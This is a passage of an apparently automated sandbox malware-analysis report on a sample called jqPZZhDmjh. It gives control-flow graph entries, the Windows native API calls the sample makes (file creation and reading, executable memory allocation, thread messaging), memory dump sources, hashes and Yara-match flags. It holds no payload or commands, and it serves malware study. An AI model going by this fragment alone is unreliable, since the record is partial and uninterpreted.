                                                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                            • Instruction Fuzzy Hash: 610112B6D4020DA7DB10EAA4DC42FDDB3789B54308F108595E91C97291F631EB14CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 247 98a350-98a3a1 call 98af50 NtCreateFile
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00979CE3,?,00984BA7,00979CE3,FFFFFFFF,?,?,FFFFFFFF,00979CE3,00984BA7,?,00979CE3,00000060,00000000,00000000), ref: 0098A39D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction ID: 5fbdcdf9f3cb0ead52fd0bb41737d90b46efba82b1f6252cf2be6e4ad6aba07d
                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction Fuzzy Hash: 08F0BDB2200208AFCB08DF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 250 98a400-98a449 call 98af50 NtReadFile
                                                                            APIs
                                                                            • NtReadFile.NTDLL(00984D62,5EB65239,FFFFFFFF,00984A21,?,?,00984D62,?,00984A21,FFFFFFFF,5EB65239,00984D62,?,00000000), ref: 0098A445
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction ID: 3f3dce1275355eca861b95ac8bd541955e3df42f979b2e2ed4a4cd46666c215b
                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction Fuzzy Hash: 76F0B7B2200208AFDB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E811CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 256 98a530-98a56d call 98af50 NtAllocateVirtualMemory
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0098B124,?,00000000,?,00003000,00000040,00000000,00000000,00979CE3), ref: 0098A569
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction ID: 1c00bc1e4891a9ed45bd1ee59e4e9caf3c907c3e2d0d705af16455b1d25f6c87
                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction Fuzzy Hash: 3DF015B2200208AFDB14DF89CC81EAB77ADAF88754F118149BE1C97241C630F810CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 253 98a52c-98a546 254 98a54c-98a56d NtAllocateVirtualMemory 253->254 255 98a547 call 98af50 253->255 255->254
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0098B124,?,00000000,?,00003000,00000040,00000000,00000000,00979CE3), ref: 0098A569
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 6499e8fa36d8993f79e5c8178206fbcd015763605b595464c285486d50662366
                                                                            • Instruction ID: 28a4d26cc45902ca46dd63382ad147252c36dbd1ec8e30e7ecf1693efa17ba9f
                                                                            • Opcode Fuzzy Hash: 6499e8fa36d8993f79e5c8178206fbcd015763605b595464c285486d50662366
                                                                            • Instruction Fuzzy Hash: 43F015B2200208AFDB14DF88CC91EAB77ADAF88754F158149FE1C97341C634E910CBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtClose.NTDLL(00984D40,?,?,00984D40,00979CE3,FFFFFFFF), ref: 0098A4A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction ID: 906f48246b8dfda1474d4b6a4f9a2b1be9a060aaa950ea6c1a7af7b3c52cffc4
                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction Fuzzy Hash: 41D01776200214ABE710EB98CC85FA77BACEF88760F154499BA1C9B242C530FA0087E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 280 98a47c-98a496 281 98a49c-98a4a9 NtClose 280->281 282 98a497 call 98af50 280->282 282->281
                                                                            APIs
                                                                            • NtClose.NTDLL(00984D40,?,?,00984D40,00979CE3,FFFFFFFF), ref: 0098A4A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
                                                                            • Instruction ID: 2a08ba9c50dafd900ee0d8c67ea7922b0d8373e886b7324801ab789a0aad8f7e
                                                                            • Opcode Fuzzy Hash: ccc6d7e7147fe07a637f85aec792b8ecc79b1abc25d90ae8e6df0f92908d5df9
                                                                            • Instruction Fuzzy Hash: 83E01275600214ABD710EBD8CC45FA77B68EF44750F154455BA1C9B242C534FA0087D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e94bc6978d7fcc568a10d48fe21c38e570833ca53f7670247569262259202196
                                                                            • Instruction ID: b64dbe47552d3c2e1e1a40c0ae21df5f4360f82149cd560b2b0f79d717e63e8a
                                                                            • Opcode Fuzzy Hash: e94bc6978d7fcc568a10d48fe21c38e570833ca53f7670247569262259202196
                                                                            • Instruction Fuzzy Hash: 8D90026160280043410AB5584814617400E97E0201B55C421E50146D4EC52589D16225
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: f15efb3a4f2eb054f4a0bc7beb35dea225716827f3e7d6c2e27357dbf6661502
                                                                            • Instruction ID: 2c3a2abf13ef261b12ecd649e55fd3e9342be0b4a91d13bed952eec31965ae07
                                                                            • Opcode Fuzzy Hash: f15efb3a4f2eb054f4a0bc7beb35dea225716827f3e7d6c2e27357dbf6661502
                                                                            • Instruction Fuzzy Hash: A490023160180842D185B558480464B000997D1301F95C415A4025798ECA158B9977A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 611ac73d04ce068f2f4f6a00455794d302600f195c4671ff3dab4bb13a7b53f3
                                                                            • Instruction ID: 81a0a1e407cc0f764e1bd30e66bf37f6745a782d5b224df142b35d541b646590
                                                                            • Opcode Fuzzy Hash: 611ac73d04ce068f2f4f6a00455794d302600f195c4671ff3dab4bb13a7b53f3
                                                                            • Instruction Fuzzy Hash: 1690022561180043010AF9580B04507004A97D5351355C421F5015694DD62189A15221
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1146e333c59b167dc5c973c36dc40d798bddf5dc6d87c4ad0d35ffda5e5e2f76
                                                                            • Instruction ID: f29d9cb147b1299e9ed388af8bb981adb4ff33e62027679596491c623a4264c6
                                                                            • Opcode Fuzzy Hash: 1146e333c59b167dc5c973c36dc40d798bddf5dc6d87c4ad0d35ffda5e5e2f76
                                                                            • Instruction Fuzzy Hash: 4690022961380042D185B558580860B000997D1202F95D815A401569CDC91589A95321
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d6e12a73f6912f81c9589a60e3d6709ce9726f5feb832be095fca147fd4f4b6d
                                                                            • Instruction ID: b252f8dfedd922debd08ea486ac59a3ce73ff86df15f9086a9447fe8e5041d94
                                                                            • Opcode Fuzzy Hash: d6e12a73f6912f81c9589a60e3d6709ce9726f5feb832be095fca147fd4f4b6d
                                                                            • Instruction Fuzzy Hash: 9F90022170180043D145B55858186074009E7E1301F55D411E4414698DD91589965322
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 884c37ede2eb0c14199c1dbd24b20bd15e2d84e5323d9302952837d4675e91e7
                                                                            • Instruction ID: d9fd1d61eaacbfc41f64f36fa190ea3ff48f64a9ec3aff660bf59423e3da807b
                                                                            • Opcode Fuzzy Hash: 884c37ede2eb0c14199c1dbd24b20bd15e2d84e5323d9302952837d4675e91e7
                                                                            • Instruction Fuzzy Hash: 8D90022164284192554AF5584804507400AA7E0241795C412A5414A94DC5269996D721
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 182846498aab5d4d12cbaedc258204a4a3abd4b9f77dbbb1a4a7814115d21bba
                                                                            • Instruction ID: ada2767d4f18b12f9287d19d3f00685b5c97d563010e68f672c3c4eb1ecfd120
                                                                            • Opcode Fuzzy Hash: 182846498aab5d4d12cbaedc258204a4a3abd4b9f77dbbb1a4a7814115d21bba
                                                                            • Instruction Fuzzy Hash: 9D90023160180453D116B5584904707000D97D0241F95C812A442469CED6568A92A221
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7766b5e006eeb572199c2641a4422dbf4964173cb02c3fdbb726f3616ed20743
                                                                            • Instruction ID: a59c9c112ed0f2eab7d5c7bf282212d4ae8fb7794649d325126c18afe38b29e9
                                                                            • Opcode Fuzzy Hash: 7766b5e006eeb572199c2641a4422dbf4964173cb02c3fdbb726f3616ed20743
                                                                            • Instruction Fuzzy Hash: 2B90023160188842D115B558880474B000997D0301F59C811A842479CEC69589D17221
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 04a7c1e94df7be4273b1d32c49b72b227ee0e519baa9399fb31bde6419ec72c0
                                                                            • Instruction ID: f596434c60f765f7a3b491a626a92500a966a6df93ab8e1a7e5851f718aa875a
                                                                            • Opcode Fuzzy Hash: 04a7c1e94df7be4273b1d32c49b72b227ee0e519baa9399fb31bde6419ec72c0
                                                                            • Instruction Fuzzy Hash: 4B90023160180442D105B9985808647000997E0301F55D411A9024699FC66589D16231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 72ed1b6c16073dd7d69b2a7f864780041783bb2356fb3cb4ea9e1e629bf2127d
                                                                            • Instruction ID: 4a8edee682b28bfcdc18c5f0fc3b0d300b55ab7f4adca36b1ff9982423ac9bc5
                                                                            • Opcode Fuzzy Hash: 72ed1b6c16073dd7d69b2a7f864780041783bb2356fb3cb4ea9e1e629bf2127d
                                                                            • Instruction Fuzzy Hash: 6190026174180482D105B5584814B070009D7E1301F55C415E5064698EC619CD926226
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ca69af56eebe7c84009df45704db7451bcc54b5c5a137dcc2bd9f643cde2f559
                                                                            • Instruction ID: b8eeecc0146d97aa98a4de58a4eaaff274c8af4c2b6aae9dcf7e5cc87928f840
                                                                            • Opcode Fuzzy Hash: ca69af56eebe7c84009df45704db7451bcc54b5c5a137dcc2bd9f643cde2f559
                                                                            • Instruction Fuzzy Hash: F6900221611C0082D205B9684C14B07000997D0303F55C515A4154698DC91589A15621
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e17e4efc44982c8e0bc5535c6d2860e56556e3114b2bd128d64591fba1936c09
                                                                            • Instruction ID: 0793f1feb404cd33b50d30bd8b7badc297598dc7638f6ff820bf4dce1dfec169
                                                                            • Opcode Fuzzy Hash: e17e4efc44982c8e0bc5535c6d2860e56556e3114b2bd128d64591fba1936c09
                                                                            • Instruction Fuzzy Hash: DA900231601C0442D105B5584C1470B000997D0302F55C411A5164699EC62589916671
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c0f38afab8197c254d5e873e1840b54873b8fe6c4daca1a32bb96bbb9c677e9f
                                                                            • Instruction ID: 24f6ae4b669aaedfad90b5dce01dd9063e0f6a8fdfc9cf57ea7e298ced169110
                                                                            • Opcode Fuzzy Hash: c0f38afab8197c254d5e873e1840b54873b8fe6c4daca1a32bb96bbb9c677e9f
                                                                            • Instruction Fuzzy Hash: 5F900221A01800824145B5688C449074009BBE1211755C521A4998694EC55989A55765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e36ddb052724e737632c881a2106ca9ddaf3e43263494710531a629694de8fcb
                                                                            • Instruction ID: 4121fd0c93eeda1bee7b888aeb81690fd44df565e87e5d78a5951bdf5a63b472
                                                                            • Opcode Fuzzy Hash: e36ddb052724e737632c881a2106ca9ddaf3e43263494710531a629694de8fcb
                                                                            • Instruction Fuzzy Hash: 20900221A0180542D106B5584804617000E97D0241F95C422A5024699FCA258AD2A231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: fbccaf481067e17c47b2a1716d128051848cd0003ff78e3ac06aa87ec6aaee7e
                                                                            • Instruction ID: ad2968dc8a6a37996796544eed1beb06d2773b12659c9c073acc5f56ce320aa3
                                                                            • Opcode Fuzzy Hash: fbccaf481067e17c47b2a1716d128051848cd0003ff78e3ac06aa87ec6aaee7e
                                                                            • Instruction Fuzzy Hash: 4790027160180442D145B5584804747000997D0301F55C411A9064698FC6598ED56765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                                            • Instruction ID: ad47ee1c311e00258de21b8961f6f38cf4edbeb23579421957b98844efc06287
                                                                            • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                                            • Instruction Fuzzy Hash: FE2123B3D402085BCB25E6A0AD42BFF73BCEF94304F0444ADE94D93142F634AA098BB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00979CE3,?,?,00979CE3,00000060,00000000,00000000,?,?,00979CE3,?,00000000), ref: 0098A68D
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0098A6C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitFreeHeapProcess
                                                                            • String ID:
                                                                            • API String ID: 1180424539-0
                                                                            • Opcode ID: 88f434622c633bc27af2c1bf28be723c31b971511076cdf1f3b3b1eadcf465e8
                                                                            • Instruction ID: 3194cefd16aa75fac016dbbf25915d33dc00b4e3b5f4b31ad7a8cdd63b33da6f
                                                                            • Opcode Fuzzy Hash: 88f434622c633bc27af2c1bf28be723c31b971511076cdf1f3b3b1eadcf465e8
                                                                            • Instruction Fuzzy Hash: B6F06DB1600204AFEB14EF64CC84EEB77A9EF88750F058659F96C5B305DA30EA108BE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 202 978308-97831f 203 978328-97835a call 98c9f0 call 97ace0 call 984e40 202->203 204 978323 call 98be50 202->204 211 97838e-978392 203->211 212 97835c-97836e PostThreadMessageW 203->212 204->203 213 978370-97838a call 97a470 212->213 214 97838d 212->214 213->214 214->211
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0097836A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_970000_jqPZZhDmjh.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: ee4f53a35430c5c1d68b73efa173dcbe9667dd560f633fddae7690584aa10f9e
                                                                            • Instruction ID: 814a92e6289b21482363d8b64083c0362c26e924de46cc30ebaf38cd1a41856b
                                                                            • Opcode Fuzzy Hash: ee4f53a35430c5c1d68b73efa173dcbe9667dd560f633fddae7690584aa10f9e
                                                                            • Instruction Fuzzy Hash: AD019672A8021877EB21B6949C07FEE776CAB80F51F044158FA08BA1C2E7A5690647E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 217 978310-97835a call 98be50 call 98c9f0 call 97ace0 call 984e40 226 97838e-978392 217->226 227 97835c-97836e PostThreadMessageW 217->227 228 978370-97838a call 97a470 227->228 229 97838d 227->229 228->229 229->226
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0097836A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118058918.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118249141.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118282967.0000000000990000.00000020.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
